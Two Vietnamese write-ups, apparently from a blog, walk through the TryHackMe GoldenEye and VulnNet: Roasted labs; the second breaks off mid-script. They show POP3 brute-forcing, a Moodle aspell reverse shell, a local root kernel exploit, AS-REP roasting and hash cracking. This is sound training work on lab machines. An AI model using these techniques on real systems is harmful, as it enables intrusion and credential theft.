Tryhackme - GoldenEye

in CTF on Tryhackme, Linux, Pop3, Telnet, Hydra, Moodle, Brute-force, Gcc
  1. Reconnaissance
  2. Enumeration
  3. RCE
  4. Privilege escalation

intro

Xin chào, lại là tôi đây. Hôm nay tôi sẽ giải CTF TryHackMe | GoldenEye

Reconnaissance

Việc đầu tiên là quét các port đang mở trên máy chủ mục tiêu

PORT      STATE SERVICE  REASON  VERSION
25/tcp    open  smtp     syn-ack Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after:  2028-04-21T03:22:34
| MD5:   cd4ad178f21617fb21a60a168f46c8c6
| SHA-1: fda3fc7b6601474696aa0f56b1261c2936e8442c
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAPokpqPNVgk6MA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMTBnVidW50dTAeFw0xODA0MjQwMzIyMzRaFw0yODA0MjEwMzIyMzRaMBExDzAN
| BgNVBAMTBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMM6
| ryxPHxf2wYf7DNTXnW6Hc6wK+O6/3JVeWME041jJdsY2UpxRB6cTmBIv7dAOHZzL
| eSVCfH1P3IS0dvSrqkA+zpPRK3to3SuirknpbPdmsNqMG1SiKLDl01o5LBDgIpcY
| V9JNNjGaxYBlyMjvPDDvgihmJwpb81lArUqDrGJIsIH8J6tqOdLt4DGBXU62sj//
| +IUE4w6c67uMAYQD26ZZH9Op+qJ3OznCTXwmJslIHQLJx+fXG53+BLiV06EGrsOk
| ovnPmixShoaySAsoGm56IIHQUWrCQ03VYHfhCoUviEw02q8oP49PHR1twt+mdj6x
| qZOBlgwHMcWgb1Em40UCAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEAfigEwPIFEL21yc3LIzPvHUIvBM5/fWEEv0t+8t5ATPfI6c2Be6xePPm6
| W3bDLDQ30UDFmZpTLgLkfAQRlu4N40rLutTHiAN6RFSdAA8FEj72cwcX99S0kGQJ
| vFCSipVd0fv0wyKLVwbXqb1+JfmepeZVxWFWjiDg+JIBT3VmozKQtrLLL/IrWxGd
| PI2swX8KxikRYskNWW1isMo2ZXXJpdQJKfikSX334D9oUnSiHcLryapCJFfQa81+
| T8rlFo0zan33r9BmA5uOUZ7VlYF4Kn5/soSE9l+JbDrDFOIOOLLILoQUVZcO6rul
| mJjFdmZE4k3QPKz1ksaCAQkQbf3OZw==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http     syn-ack Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
55006/tcp open  ssl/pop3 syn-ack Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Issuer: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d0392e71c76a2cb3e694ec407228ec63
| SHA-1: 9d6a92eb5f9fe9ba6cbddc9355fa5754219b0b77
| -----BEGIN CERTIFICATE-----
| MIIDnTCCAoWgAwIBAgIJAOZHv9ZnCiJ+MA0GCSqGSIb3DQEBCwUAMGUxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAG
| A1UEAwwJbG9jYWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDAe
| Fw0xODA0MjQwMzIzNTJaFw0yODA0MjMwMzIzNTJaMGUxHDAaBgNVBAoME0RvdmVj
| b3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAGA1UEAwwJbG9j
| YWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAMo64gzxBeOvt+rgUQncWU2OJESGR5YJ9Mcd
| h0nF6m0o+zXwvkSx+SW5I3I/mpJugQfsc2lW4txo3xoAbvVgc2kpkkna8ojodTS3
| iUyKXwN3y2KG/jyBcrH+rZcs5FIpt5tDB/F1Uj0cdAUZ+J/v2NEw1w+KjlX2D0Zr
| xpgnJszmEMJ3DxNBc8+JiROMT7V8iYu9/Cd8ulAdS8lSPFE+M9/gZBsRbzRWD3D/
| OtDaPzBTlb6es4NfrfPBanD7zc8hwNL5AypUG/dUhn3k3rjUNplIlVD1lSesI+wM
| 9bIIVo3IFQEqiNnTdFVz4+EOr8hI7SBzsXTOrxtH23NQ6MrGbLUCAwEAAaNQME4w
| HQYDVR0OBBYEFFGO3VTitI69jNHsQzOz/7wwmdfaMB8GA1UdIwQYMBaAFFGO3VTi
| tI69jNHsQzOz/7wwmdfaMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AMm4cTA4oSLGXG+wwiJWD/2UjXta7XAAzXofrDfkRmjyPhMTsuwzfUbU+hHsVjCi
| CsjV6LkVxedX4+EQZ+wSa6lXdn/0xlNOk5VpMjYkvff0ODTGTmRrKgZV3L7K/p45
| FI1/vD6ziNUlaTzKFPkmW59oGkdXfdJ06Y7uo7WQALn2FI2ZKecDSK0LonWnA61a
| +gXFctOYRnyMtwiaU2+U49O8/vSDzcyF0wD5ltydCAqCdMTeeo+9DNa2u2IOZ4so
| yPyR+bfnTC45hue/yiyOfzDkBeCGBqXFYcox+EUm0CPESYYNk1siFjjDVUNjPGmm
| e1/vPH7tRtldZFSfflyHUsA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA SASL(PLAIN) RESP-CODES UIDL TOP USER AUTH-RESP-CODE PIPELINING
55007/tcp open  pop3     syn-ack Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL TOP STLS USER PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Issuer: commonName=localhost/organizationName=Dovecot mail server/organizationalUnitName=localhost/emailAddress=root@localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d0392e71c76a2cb3e694ec407228ec63
| SHA-1: 9d6a92eb5f9fe9ba6cbddc9355fa5754219b0b77
| -----BEGIN CERTIFICATE-----
| MIIDnTCCAoWgAwIBAgIJAOZHv9ZnCiJ+MA0GCSqGSIb3DQEBCwUAMGUxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAG
| A1UEAwwJbG9jYWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDAe
| Fw0xODA0MjQwMzIzNTJaFw0yODA0MjMwMzIzNTJaMGUxHDAaBgNVBAoME0RvdmVj
| b3QgbWFpbCBzZXJ2ZXIxEjAQBgNVBAsMCWxvY2FsaG9zdDESMBAGA1UEAwwJbG9j
| YWxob3N0MR0wGwYJKoZIhvcNAQkBFg5yb290QGxvY2FsaG9zdDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBAMo64gzxBeOvt+rgUQncWU2OJESGR5YJ9Mcd
| h0nF6m0o+zXwvkSx+SW5I3I/mpJugQfsc2lW4txo3xoAbvVgc2kpkkna8ojodTS3
| iUyKXwN3y2KG/jyBcrH+rZcs5FIpt5tDB/F1Uj0cdAUZ+J/v2NEw1w+KjlX2D0Zr
| xpgnJszmEMJ3DxNBc8+JiROMT7V8iYu9/Cd8ulAdS8lSPFE+M9/gZBsRbzRWD3D/
| OtDaPzBTlb6es4NfrfPBanD7zc8hwNL5AypUG/dUhn3k3rjUNplIlVD1lSesI+wM
| 9bIIVo3IFQEqiNnTdFVz4+EOr8hI7SBzsXTOrxtH23NQ6MrGbLUCAwEAAaNQME4w
| HQYDVR0OBBYEFFGO3VTitI69jNHsQzOz/7wwmdfaMB8GA1UdIwQYMBaAFFGO3VTi
| tI69jNHsQzOz/7wwmdfaMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AMm4cTA4oSLGXG+wwiJWD/2UjXta7XAAzXofrDfkRmjyPhMTsuwzfUbU+hHsVjCi
| CsjV6LkVxedX4+EQZ+wSa6lXdn/0xlNOk5VpMjYkvff0ODTGTmRrKgZV3L7K/p45
| FI1/vD6ziNUlaTzKFPkmW59oGkdXfdJ06Y7uo7WQALn2FI2ZKecDSK0LonWnA61a
| +gXFctOYRnyMtwiaU2+U49O8/vSDzcyF0wD5ltydCAqCdMTeeo+9DNa2u2IOZ4so
| yPyR+bfnTC45hue/yiyOfzDkBeCGBqXFYcox+EUm0CPESYYNk1siFjjDVUNjPGmm
| e1/vPH7tRtldZFSfflyHUsA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time

4 port đang mở.

Enumeration

Vì có port 80 nên tôi sẽ bắt đầu với web trước.

web

Tìm kiếm trong source web tôi có 1 file js

<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="[index.css](view-source:http://10.10.169.41/index.css)">
</head>

	<span id="GoldenEyeText" class="typeing"></span><span class='blinker'>&#32;</span>

<script src="[terminal.js](view-source:http://10.10.169.41/terminal.js)"></script>
	
</html>

Truy cập vào file js này tôi tìm được vài thứ thú vị

var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

 
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

Người phải thay đổi password là Boris.

Và khi giải mã đoạn code với HTML decoder, tôi tìm được password của anh ta.

Truy cập vào path /sev-home/ và login bằng username và password vừa tìm được

sev-home

Thử vào source web xem có gì đặc biệt không

</video>
<div id="golden">
<h1>GoldenEye</h1>
<p>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) </p>
<p>Please email a qualified GNO supervisor to receive the online <b>GoldenEye Operators Training</b> to become an Administrator of the GoldenEye system</p>
<p>Remember, since <b><i>security by obscurity</i></b> is very effective, we have configured our pop3 service to run on a very high non-default port</p>
</div>

...

Qualified GoldenEye Network Operator Supervisors: 
Natalya
Boris

Để ý 1 chút khi có nhắc đến pop3. Tôi sẽ thử khai thác qua email

┌──(kalikali)-[~]
└─$ telnet 10.10.52.162 55007
Trying 10.10.52.162...
Connected to 10.10.52.162.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass InvincibleHack3r
-ERR [AUTH] Authentication failed.

Không khả thi cho lắm. Tuy nhiên tôi còn 1 cái tên nữa là natalya, và để tìm được password của user này thì tôi lại quay về cách đơn giản nhất thôi - bruteforce.

[55007][pop3] host: 10.10.52.162 login: natalya password: bird

Tôi cũng sẽ thử lại với user boris vì có thể pass phía trên không phải pass để login pop3

[55007][pop3] host: 10.10.52.162 login: boris password: secret1!

Login lại pop3

┌──(kalikali)-[~]
└─$ telnet 10.10.52.162 55007                                                                                  
Trying 10.10.52.162...
Connected to 10.10.52.162.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048

Message 1

retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.

Message 2

retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

Theo như message 2, tôi phải thêm domain vào file hosts và vào domain severnaya-station.com/gnocertdir để login với user và password phía trên

moodle

Sau khi đã thêm domain và hosts và truy cập url, tôi được 1 trang web sử dụng Moodle LMS.

Đăng nhập bằng user và pass ở phía trên, vào được user này tôi có 1 message chưa đọc

doak

Ở đây tôi còn có thêm 1 user nữa tên là Doak. Thử bruteforce user này luôn

[55007][pop3] host: 10.10.52.162 login: doak password: goat

┌──(kalikali)-[~]
└─$ telnet 10.10.52.162 55007
Trying 10.10.52.162...
Connected to 10.10.52.162.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

Login moodle với user này. Dạo quanh 1 chút tôi tìm thấy 1 file có tên s3cret.txt bên trong phần My private files. Tải file đó về

*007,

*I was able to capture this apps adm1n cr3ds through clear txt.

*Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

*Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Tải ảnh theo đường dẫn trên về và phân tích

┌──(kalikali)-[~]
└─$ exiftool for-007.jpg 
ExifTool Version Number         : 12.51
File Name                       : for-007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2018:04:24 20:40:02-04:00
File Access Date/Time           : 2022:12:27 23:35:57-05:00
File Inode Change Date/Time     : 2022:12:27 23:35:47-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066

┌──(kalikali)-[~]
└─$ echo eFdpbnRlcjE5OTV4IQ== | base64 -d                       
xWinter1995x!

Đăng nhập moodle với user admin và pass là đoạn code tôi vừa tìm được.

RCE

Tiếp theo phải tìm cách để lấy RCE.

Theo như trong phần hướng dẫn trong task, tìm đến Aspell, sau đó đổi Spell engine thành PSpellShell và thay đổi Path to aspell thành reverse shell chứa IP và port mà tôi muốn gọi về máy local.

aspell

Bây giờ để kích hoạt được shell này, tôi phải thực hiện spell check và server sẽ gọi spellpath mà tôi đã thay đổi thành shell ban nãy.

Trước khi spell check thì cần tạo listener với port vừa cấu hình trong shell

Navigation -> Home -> My Profile -> Blogs -> Add a new entry

spellcheck

Ấn vào dấu tích xanh ABC trên thanh công cụ và quay lại listener

┌──(kalikali)-[~/CVE-2020-14321]
└─$ nc -lnvp 9001                                     
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.165.144] 44411
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$

Privilege escalation

Tiếp theo, cũng trong phần mô tả của task, tôi sẽ tải exploit 37292 về để đẩy nó lên máy remote và dùng gcc để complie nó.

$ gcc 37292.c -o exploit
gcc 37292.c -o exploit
/bin/sh: 11: gcc: not found

Máy này không có gcc, vậy thì tôi sẽ thử dùng cc

$ cc 37292.c -o exploit
cc 37292.c -o exploit
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
        if(unshare(CLONE_NEWUSER) != 0)
           ^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                ^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
            waitpid(pid, &status, 0);
            ^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.

$ ./exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# ls -la /root
ls -la /root
total 44
drwx------  3 root root 4096 Apr 29  2018 .
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..
-rw-r--r--  1 root root   19 May  3  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------  2 root root 4096 Apr 28  2018 .cache
-rw-------  1 root root  144 Apr 29  2018 .flag.txt
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo

Tryhackme - VulnNet: Roasted

in CTF on Tryhackme, SMB, Windows, Impacket
  1. Reconnaissance
  2. Privilege escalation

intro

Xin chào, lại là tôi đây. Hôm nay tôi sẽ giải CTF TryHackMe | VulnNet: Roasted

Reconnaissance

Như thông thường, việc đầu tiên cần làm quét các cổng đang mở trên máy mục tiêu.

Open 10.10.15.106:88
Open 10.10.15.106:135
Open 10.10.15.106:139
Open 10.10.15.106:445
Open 10.10.15.106:389
Open 10.10.15.106:464
Open 10.10.15.106:593
Open 10.10.15.106:636
Open 10.10.15.106:3268
Open 10.10.15.106:3269
Open 10.10.15.106:49684
Open 10.10.15.106:49697
Open 10.10.15.106:49669
Open 10.10.15.106:49670
Open 10.10.15.106:49665

Quá nhiều port đang mở, nhưng vì trong intro cũng đã nói đây là máy Window, vậy nên tôi sẽ khai thác port window trước: 135, 139, 445, 389

Kiểm tra share file với smbclient

┌──(kalikali)-[~]
└─$ smbclient -L 10.10.15.106
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.15.106 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Có xuất hiện share file của anonymous nên tôi truy cập với user này

Sử dụng impacket

┌──(kalikali)-[~]
└─$ impacket-lookupsid anonymous@10.10.15.106
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.15.106
[*] StringBinding ncacn_np:10.10.15.106[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Thực hiện lấy các user có trong domain này tôi được

Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

Tạo 1 file user.txt và nhét hết chúng vào đó

Thực hiện brute-force với các user phía trên

┌──(kalikali)-[~]
└─$ impacket-GetNPUsers -dc-ip 10.10.15.106 -usersfile user.txt -no-pass vulnnet-rst.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:06e72f956b790ca9f51e200ba6ba5533$85e557a35c7ce7cf1e9d648ca35799fa8e6a141a4aea843dd759a8cffae1aa642bb90eb031b5e0b68277413dcdbe4ca2c4bc55240aa9bda8401876df2a9e96991153ded0e68f46ef369f68587e2f486f4411c85730ae91b95d3cc8c351b54282d5bc52ba2268c3d529e70c83c6e16ffa85e72c596e5fadea45ea5260b8c10bcc96feee72536887d1626119e9bc96dbe8f3f9a0cf6fc3e30cd0a6b737745dd200718cf3c69314d467be57c47be6a37af19148b57c68af2544da5fd528485920f2894b2ee3594ba4c4b5f72e94bfb66bf32e3fee1f3a6918e021da7da1708607cca66dd386018d3e14968b9203179d5d06896669951ab2
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH setsmbcli
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

Lấy đoạn hash này về và giải mã nó bằng john

┌──(kalikali)-[~]
└─$ sudo john hash.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889*        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)

Sử dụng user t-skid và pass ở trên để truy cập smbclient

┌──(kalikali)-[~]
└─$ smbclient -U vulnnet-rst.local/t-skid //10.10.24.168/NETLOGON                              
Password for [VULNNET-RST.LOCAL\t-skid]:
Try "help" to get a list of possible commands.
smb: \> DIR
  .                                   D        0  Tue Mar 16 19:15:49 2021
  ..                                  D        0  Tue Mar 16 19:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 19:18:14 2021

                8771839 blocks of size 4096. 4554815 blocks available
smb: \> get ResetPassword.vbs /home/kali/ResetPassword.vbs
getting file \ResetPassword.vbs of size 2821 as /home/kali/ResetPassword.vbs (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)

Mở nó ra và tôi tìm thấy 1 user - pass mới

┌──(kalikali)-[~]
└─$ cat ResetPassword.vbs 
Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
